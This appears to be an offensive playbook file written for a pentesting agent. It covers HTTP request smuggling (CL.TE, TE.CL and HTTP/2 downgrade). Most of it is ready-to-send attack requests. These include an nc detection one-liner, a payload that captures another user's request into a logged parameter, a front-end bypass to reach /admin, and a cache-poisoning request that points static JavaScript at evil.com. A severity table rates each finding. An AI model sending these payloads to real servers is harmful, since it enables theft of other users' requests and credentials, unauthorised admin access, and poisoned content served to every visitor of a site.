attack-request-smuggling
HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass
| Field | Value |
|---|---|
| name | attack-request-smuggling |
| description | HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["request-smuggling","http-desync","web","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Smuggling + cache = stored XSS/redirect for all users"} |
Exploit disagreements between front-end and back-end servers on request boundary parsing (Content-Length vs Transfer-Encoding) to smuggle a second request.
CL.TE (front uses Content-Length, back uses Transfer-Encoding):

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

TE.CL (front uses Transfer-Encoding, back uses Content-Length):

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```
Send an ambiguous request and measure the response time:

```bash
# CL.TE detection (timeout = vulnerable)
printf 'POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\nX' | timeout 10 nc TARGET 80
```
CL.TE confirmed:

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404-proof HTTP/1.1
X: x
```

If the next request to / returns a 404 or a different page, smuggling is confirmed.
Capture another user's request:

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked

0

POST /log HTTP/1.1
Content-Length: 10000
Content-Type: application/x-www-form-urlencoded

data=
```

The next user's request is appended to the data= parameter.
Bypass front-end access controls:

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 50
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: TARGET
X: x
```
Cache poisoning via smuggling:

```http
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked

0

GET /static/main.js HTTP/1.1
Host: evil.com
X: x
```
```bash
# HTTP/2 downgrade smuggling
curl --http2 https://TARGET/ \
  -H "Content-Length: 0" \
  -H "Transfer-Encoding: chunked" \
  -d "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: TARGET\r\n\r\n"
```

| Finding | Severity |
|---|---|
| Request smuggling → capture user requests | Critical (P1) |
| Smuggling → admin access bypass | Critical (P1) |
| Smuggling → cache poisoning | Critical (P1) |
| CL.TE or TE.CL desync confirmed | High (P2) |